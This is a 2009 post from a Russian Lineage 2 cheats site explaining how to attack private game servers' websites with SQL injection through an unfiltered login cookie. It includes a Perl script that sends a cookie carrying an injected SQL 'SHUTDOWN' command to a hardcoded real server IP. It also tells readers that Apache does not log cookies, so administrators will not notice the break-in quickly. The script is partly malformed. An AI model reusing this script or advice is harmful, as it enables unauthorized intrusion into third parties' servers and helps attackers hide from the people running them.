Lineage Сервера
 


 
 
 


ТОП
» Server La2 BF Украинский Сервер рейты x50 x1000 PVP

» Чит на Дюп адены в lineage2 java

» Lineage 2 скачать базу хаков и читов для игры и все бесплатно

» Чит на Заточку предметов la2fun для LA II скачать бесплатно

» Чит Массовая заточка оружия в Lineage 2

» Lineage 2 чит программы для игры скачать

» La2Lionna PvP Interlude х1200 & Gracia part2 х15

» Рейты Free4Game Lineage 2 Interlude Server Exp: x5000Р Рейты SP: x5000 Рейт ...

» Lineage 2 боты (Walkers Bots) скачать бесплатно все версии ботов

» l2vinterland сервер с мультипрофой, рейтами x5000,на SP рейты становят х50

» Lineage 2 чит, L2Control PRO 5.0 скачать бесплатно

» Баг с Заточкой в Lineage 2

» Скачать Русификатор для Lineage2 Interlude все переведено

» L2Lord х1000000 (Interlude) x200 (Gracia Part 2 "Тестовый)

» Cервер Lineage 2 C6: Interlude shock-world бесплатный надежный 8 ядерный



ССЫЛКИ РЕКЛАМНЫЕ



Lineage 2 » Читы, секреты, баги » Баг с Куками в Lineage 2 для знающих PHP
  21 апреля 2009 | Комменов(0) 

Баг с Куками в Lineage 2 для знающих PHP

Если на вашем сервере не полу4ается сделать инъекцию 4ерез сайт стандартными методами (будь то инъекция 4ерез
страницу регистрации или другие "глю4ные" скрипты) не от4аивайтесь.

Возможно на сайте сервера есть "ли4ный кабинет", в который вы входите используя свой логин и пароль (как например на
la2.raid.ru или lineageii.ru)
Скорее всего сделать инъекцию напрямую 4ерез поля login и password сделать не полу4ится, т.к. администраторы наверняка
сделали фильтр "зловредных символов".
Но у таких ли4ных кабинетов есть своё уязвимое место.

Заметим 4то одинажды зайдя на сайт, он "запоминает" нас делая запись с нашими логином и паролем в кукисы. Само собой
когда мы в следующий раз зайдем на сайт, браузер автомати4ески пошлет наш логин и пароль из кукисов.
Вот тут администраторы и 4аще всего ошибаются, забыв сделать элементарную проверку кукисов, в рас4ете 4то
пользователь не сможет их править, а зря!



Ниже приведен скрипт, который посылает наш кукис серверу, в котором содержится инъекция.

PHP код:
язык - perl, думаю срипт можно будет без труда переписать на более близкий к вам по духу язык)
#!/usr/bin/perl -w
use IO::Socket;
use strict;
use CGI;
my $host = '212.33.232.148';
#здесь host - IP сервера на который посылается куки (в нашем слу4ае это рейд)
my $EOL = "\015\012";
my $NL = "%0D%0A";
my $BLANK = $EOL x 2;
my $remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)");
unless ($remote)
{
die "cannot connect to http daemon on $host\n";
}
$remote->autoflush(1);
print
$remote
"GET /index.php HTTP/1.0".$EOL.
"Cookie: login=\'SHUTDOWN--".
$BLANK;
while (0 and )
{
print;
# last if $. == 200;
}
close $remote;

У данной инъекции есть один весомый плюс:
апа4 не пишет в свои логи кукисы, так 4то сделав инъекцию 4ерез них администраторы далеко не сразу поймут 4ерез 4то их
взломали



 
Рекомендуем зарегистрироваться, чтобы делиться своими новостями и писать комментарии.

ИНЕРЕСНО:




» Lineage 2 сервера
» PVP СЕРВЕРА
» LA2 СЕРВЕРА
» LINEAGE ЧИТЫ
» ВИДЕО LINEAGE
» СКАЧАТЬ LINEAGE
» Боты LINEAGE
» Новости
 
Что нехватает на сайте ?

Серверов
Читов
Картинок
Видео
Скачать